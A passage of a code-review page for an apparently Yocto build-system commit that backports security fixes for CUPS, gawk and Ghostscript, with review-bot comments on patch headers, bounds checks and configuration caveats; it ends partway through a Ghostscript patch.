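+diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in
+index b258849078..a07536f3e4 100644
+--- a/conf/cupsd.conf.in
++++ b/conf/cupsd.conf.in
+@@ -68,7 +68,13 @@ IdleExitTimeout @EXIT_TIMEOUT@
+ Order deny,allow
+ </Limit>
+
+- <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job CUPS-Get-Document>
++ <Limit Send-Document Send-URI Hold-Job Release-Job Restart-Job Purge-Jobs Set-Job-Attributes Create-Job-Subscription Renew-Subscription Cancel-Subscription Get-Notifications Reprocess-Job Cancel-Current-Job Suspend-Current-Job Resume-Job Cancel-My-Jobs Close-Job CUPS-Move-Job>
++ Require user @OWNER @SYSTEM
++ Order deny,allow
++ </Limit>
++
++ <Limit CUPS-Get-Document>
++ AuthType Default
+ Require user @OWNER @SYSTEM
+ Order deny,allow
+ </Limit>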
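Review bot: This fix changes only the `conf/cupsd.conf.in` template, so it reaches a target only through a freshly generated cupsd.conf. An image that ships its own cupsd.conf, or a device that keeps /etc/cups across upgrades, stays without `AuthType Default` on `CUPS-Get-Document` even though the `CVE:` tag marks the issue as patched. The patch header should carry that caveat, e.g. `Note: config-only fix; custom or preserved cupsd.conf files need the same <Limit CUPS-Get-Document> block`. Only one policy block is visible in the hunk, so whether the template's other policies already require authentication cannot be confirmed from here.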
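diff --git a/meta/recipes-extended/cups/cups/CVE-2023-34241.patch b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
new file mode 100644
index 0000000000..816efc2946
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-34241.patch
@@ -0,0 +1,65 @@
+From ffd290b4ab247f82722927ba9b21358daa16dbf1 Mon Sep 17 00:00:00 2001
+From: Rose <83477269+AtariDreams@users.noreply.github.com>
+Date: Thu, 1 Jun 2023 11:33:39 -0400
+Subject: [PATCH] Log result of httpGetHostname BEFORE closing the connection
+
+httpClose frees the memory of con->http. This is problematic because httpGetHostname then tries to access the memory it points to.
+
+We have to log the hostname first.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/9809947a959e18409dcf562a3466ef246cb90cb2]
+CVE: CVE-2023-34241
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ scheduler/client.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/scheduler/client.c b/scheduler/client.c
+index 91e441188c..327473a4d1 100644
+--- a/scheduler/client.c
++++ b/scheduler/client.c
+@@ -193,13 +193,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ /*
+ * Can't have an unresolved IP address with double-lookups enabled...
+ */
+-
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "Name lookup failed - connection from %s closed!",
++ "Name lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
+
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -235,11 +233,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+ * with double-lookups enabled...
+ */
+
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+- "IP lookup failed - connection from %s closed!",
++ "IP lookup failed - closing connection from %s!",
+ httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }
+@@ -256,11 +254,11 @@ cupsdAcceptClient(cupsd_listener_t *lis)/* I - Listener socket */
+
+ if (!hosts_access(&wrap_req))
+ {
+- httpClose(con->http);
+-
+ cupsdLogClient(con, CUPSD_LOG_WARN,
+ "Connection from %s refused by /etc/hosts.allow and "
+ "/etc/hosts.deny rules.", httpGetHostname(con->http, NULL, 0));
++
++ httpClose(con->http);
+ free(con);
+ return;
+ }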
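Review bot: The `From` line of this patch names commit ffd290b4ab24 while `Upstream-Status` points at 9809947a959e, and nothing in the header says how the two relate; CVE-2023-4504.patch has the same gap (a9a7daa77699 against 2431caddb7e6). That makes it harder to confirm the backport matches the upstream fix exactly. A header line such as `(cherry picked from commit <upstream hash>)`, which CVE-2023-32324.patch already carries, would close it. Possibly one hash is a pull-request commit and the other the merged one, but the page does not show that.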
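diff --git a/meta/recipes-extended/cups/cups/CVE-2023-4504.patch b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
new file mode 100644
index 0000000000..be0db1fbd4
--- /dev/null
+++ b/meta/recipes-extended/cups/cups/CVE-2023-4504.patch
@@ -0,0 +1,40 @@
+From a9a7daa77699bd58001c25df8a61a8029a217ddf Mon Sep 17 00:00:00 2001
+From: Zdenek Dohnal <zdohnal@redhat.com>
+Date: Fri, 1 Sep 2023 16:47:29 +0200
+Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
+
+We didn't check for end of buffer if it looks there is an escaped
+character - check for NULL terminator there and if found, return NULL
+as return value and in `ptr`, because a lone backslash is not
+a valid PostScript character.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
+CVE: CVE-2023-4504
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ cups/raster-interpret.c | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+--- a/cups/raster-interpret.c
++++ b/cups/raster-interpret.c
+@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st, /* I - S
+
+ cur ++;
+
+- if (*cur == 'b')
++ /*
++ * Return NULL if we reached NULL terminator, a lone backslash
++ * is not a valid character in PostScript.
++ */
++
++ if (!*cur)
++ {
++ *ptr = NULL;
++
++ return (NULL);
++ }
++
++ if (*cur == 'b')
+ *valptr++ = '\b';
+ else if (*cur == 'f')
+ *valptr++ = '\f';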
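diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 02b016fdf1..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Collection of autoconf m4 macros"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
 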
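diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Line-oriented text editor"
 HOMEPAGE = "http://www.gnu.org/software/ed/"
+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \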
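diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
+From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
+From: "Arnold D. Robbins" <arnold@skeeve.com>
+Date: Wed, 3 Aug 2022 13:00:54 +0300
+Subject: [PATCH] Smal bug fix in builtin.c.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
+Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
+CVE: CVE-2023-4156
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog | 6 ++++++
+ builtin.c | 5 ++++-
+ 2 files changed, 10 insertions(+), 1 deletion(-)
+
+--- gawk-5.1.0.orig/builtin.c
++++ gawk-5.1.0/builtin.c
+@@ -957,7 +957,10 @@ check_pos:
+ s1++;
+ n0--;
+ }
+- if (val >= num_args) {
++ // val could be less than zero if someone provides a field width
++ // so large that it causes integer overflow. Mainly fuzzers do this,
++ // but let's try to be good anyway.
++ if (val < 0 || val >= num_args) {
+ toofew = true;
+ break;
+ }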
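Review bot: The added `val < 0` test detects the overflow only after it has happened; the new comment itself says `val` turns negative through integer overflow of a large field width, and for a signed type that is undefined behaviour in C rather than a guaranteed wrap. The digit accumulation is above the hunk, so the type of `val` and how it is built are inferred. This matches upstream, so no divergence is suggested, but the header could record the limitation: `Note: relies on the overflowed value being negative; the parsing loop itself is unchanged`. The diffstat in the header also still lists ChangeLog although only the builtin.c hunk is carried.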
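diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
+These tests require an unloaded host as otherwise timing sensitive tests can fail
+https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+--- a/test/Maketests~
++++ b/test/Maketests
+@@ -2069,7 +2069,2 @@
+
+-timeout:
+- @echo $@ $(ZOS_FAIL)
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+ typedregex1:
+@@ -2297,7 +2292,2 @@
+ @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+-time:
+- @echo $@
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+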
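diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
 PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
 
 SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+ file://remove-sensitive-tests.patch \
  file://run-ptest \
+ file://CVE-2023-4156.patch \
 "
 
 SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
 do_install_ptest() {
  mkdir ${D}${PTEST_PATH}/test
  ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
- for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
- do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+ # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+ TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+ for i in $TESTS Maketests inclib.awk; do
+ cp ${S}/test/$i* ${D}${PTEST_PATH}/test
  done
  sed -i -e 's|/usr/local/bin|${bindir}|g' \
  -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
 
  sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+ # These tests require an unloaded host as otherwise timing sensitive tests can fail
+ # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+ rm -f ${D}${PTEST_PATH}/test/time.*
+ rm -f ${D}${PTEST_PATH}/test/timeout.*
 }
 
 RDEPENDS_${PN}-ptest += "make"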
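diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
+From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 17 Jul 2023 14:06:37 +0100
+Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
+ devices/gdevpcx.c
+
+Bounds check the buffer, before dereferencing the pointer.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
+CVE: CVE-2023-38559
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gdevdevn.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gdevdevn.c b/base/gdevdevn.c
+index 3b019d6..2888776 100644
+--- a/base/gdevdevn.c
++++ b/base/gdevdevn.c
+@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
+ byte data = *from;
+
+ from += step;
+- if (data != *from || from == end) {
++ if (from >= end || data != *from) {
+ if (data >= 0xc0)
+ gp_fputc(0xc1, file);
+ } else {
+--
+2.25.1
+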
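diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
+From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Wed, 20 May 2020 16:02:07 +0100
+Subject: [PATCH] txtwrite - address memory problems
+
+Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
+Also bug #702346 and the earlier report #701877.
+
+The problems occur because its possible for a single character code in
+a PDF file to map to more than a single Unicode code point. In the case
+of the file for 701877 the character code maps to 'f' and 'i' (it is an
+fi ligature).
+
+The code should deal with this, but we need to ensure we are using the
+correct index. In addition, if we do get more Unicode code points than
+we expected, we need to set the widths of the 'extra' code points to
+zero (we only want to consider the width of the original character).
+
+This does mean increasing the size of the Widths array to cater for
+the possibility of more entries on output than there were on input.
+
+While working on it I noticed that the Unicode remapping on little-
+endian machines was reversing the order of the Unicode values, when
+there was more than a single code point returned, so fixed that at
+the same time.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
+CVE: CVE-2020-36773
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
+index 87f9355..bddce5a 100644
+--- a/devices/vector/gdevtxtw.c
++++ b/devices/vector/gdevtxtw.c
+@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
+ #else
+ b = (char *)Buffer;
+ u = (char *)unicode;
+- while (l >= 0) {
+- *b++ = *(u + l);
+- l--;
+- }
+
++ for (l=0;l<length;l+=2, u+=2){
++ *b++ = *(u+1);
++ *b++ = *u;
++ }
+ #endif
+ gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
+ return length / sizeof(short);
+@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ &penum->text_state->matrix, &wanted);
+ pte->returned.total_width.x += wanted.x;
+ pte->returned.total_width.y += wanted.y;
+- penum->Widths[pte->index - 1] = wanted.x;
++ penum->Widths[penum->TextBufferIndex] = wanted.x;
+
+ if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
+ gs_point tpt;
+@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ pte->returned.total_width.x += dpt.x;
+ pte->returned.total_width.y += dpt.y;
+
+- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
+- penum->Widths[pte->index - 1] += dpt.x;
++ penum->Widths[penum->TextBufferIndex] += dpt.x;
++ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
++ /* If a single text code returned multiple Unicode values, then we need to set the
++ * 'extra' code points' widths to 0.
++ */
++ if (code > 1)
++ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
++ penum->TextBufferIndex += code;
+ }
+ return 0;
+ }
+@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!penum->text_state->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
+ penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
+@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!unsorted_entry->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
+ (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
+@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
+ if (!penum->TextBuffer)
+ return gs_note_error(gs_error_VMerror);
+ penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
+- pte->text.size, sizeof(float), "txtwrite temporary widths array");
++ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
+ if (!penum->Widths)
+ return gs_note_error(gs_error_VMerror);
+ }
+--
+2.25.1
+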
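Review bot: Nothing in these hunks bounds `penum->TextBufferIndex` against the new allocation of `pte->text.size * 4` floats, yet `txtwrite_process_plain_text` now writes `Widths[TextBufferIndex]` and zeroes `code - 1` further entries after it. The factor 4 is an unexplained constant, and the multiplication passed to `gs_malloc` in `textw_text_process` is not checked for overflow. If `TextBuffer` is allocated with the same factor (its allocation sits just above the last hunk and is not visible), a shared named constant plus a guard such as `if (penum->TextBufferIndex + code > pte->text.size * 4) return_error(gs_error_rangecheck);` would state the invariant; since this is a backport, that is a point to raise upstream rather than to change locally. All four functions touched start and end outside their hunks.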
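diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
+From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Thu, 20 Aug 2020 17:19:09 +0100
+Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
+
+Firstly, in gx_device_delete_output_file the iodev pointer was being passed
+to the delete_method incorrectly (passing a pointer to that pointer). Thus
+when we attempted to use that to confirm permission to delete the file, it
+crashed. Credit to Ken for finding that.
+
+Secondly, due to the way pdfwrite works, when running with an output file per
+page, it creates the current output file immediately it has completed writing
+the previous one. Thus, it has to delete that partial file on exit.
+
+Previously, the output file was not added to the "control" permission list,
+so an attempt to delete it would result in an error. So add the output file
+to the "control" as well as "write" list.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gsdevice.c | 2 +-
+ base/gslibctx.c | 20 ++++++++++++++------
+ 2 files changed, 15 insertions(+), 7 deletions(-)
+
+diff --git a/base/gsdevice.c b/base/gsdevice.c
+index 913119495..ac78af93f 100644
+--- a/base/gsdevice.c
++++ b/base/gsdevice.c
+@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
+ parsed.len = strlen(parsed.fname);
+ }
+ if (parsed.iodev)
+- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
++ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
+ else
+ code = gs_note_error(gs_error_invalidfileaccess);
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index d726c58b5..ff8fc895e 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ rewrite_percent_specifiers(f);
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (code < 0)
+ return code;
+ break;
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
++ if (code < 0)
++ return code;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_add_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_add_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ /* Try to rewrite any %d (or similar) in the string */
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ the pipe_fopen(), the leading '|' has been stripped.
+ */
+ code = gs_remove_control_path(mem, gs_permit_file_writing, f);
++ if (code < 0)
++ return code;
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+ break;
+@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_remove_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+--
+2.25.1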
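Review bot: The header tags a 2020 pdfwrite permission fix with `CVE: CVE-2021-3781` without saying why; presumably it is a prerequisite for CVE-2021-3781_3.patch, and saying so keeps anyone from treating this patch alone as the fix. `Upstream-Status: Backport:` with the URL on the following line also differs from the bracketed one-line form the other patches in this commit use, and CVE-2021-3781_2.patch and CVE-2021-3781_3.patch repeat it. Suggested header lines: `Prerequisite for the CVE-2021-3781 fix in CVE-2021-3781_3.patch` and `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f]`.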
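diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
+From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 24 Aug 2020 09:24:31 +0100
+Subject: [PATCH] Coverity 361429: move "break" to correct place.
+
+We had to add the outputfile to the "control" file permission list (as well
+as write), but for the "pipe" case, I accidentally added the call after the
+break out of loop that checks for a pipe.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gslibctx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index ff8fc895e..63dfbe2e0 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ code = gs_add_control_path(mem, gs_permit_file_writing, f);
+ if (code < 0)
+ return code;
+- break;
+ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
++ break;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+--
+2.25.1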
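--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ /* The pipe device can be reached in two ways, explicltly with %pipe%
++ or implicitly with "|", so we have to check for both
++ */
++ char f[gp_file_name_sizeof];
++ const char *pipestr = "|";
++ const size_t pipestrlen = strlen(pipestr);
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++ int code1;
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ code1 = gp_validate_path(mem, f, access);
++
++ memcpy(f, pipestr, pipestrlen);
++ memcpy(f + pipestrlen, fname, nlen + 1);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+ return gs_error_invalidfileaccess;
+
+ /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ long hfile; /* Correct for Win32, may be wrong for Win64 */
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ char f[gp_file_name_sizeof];
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
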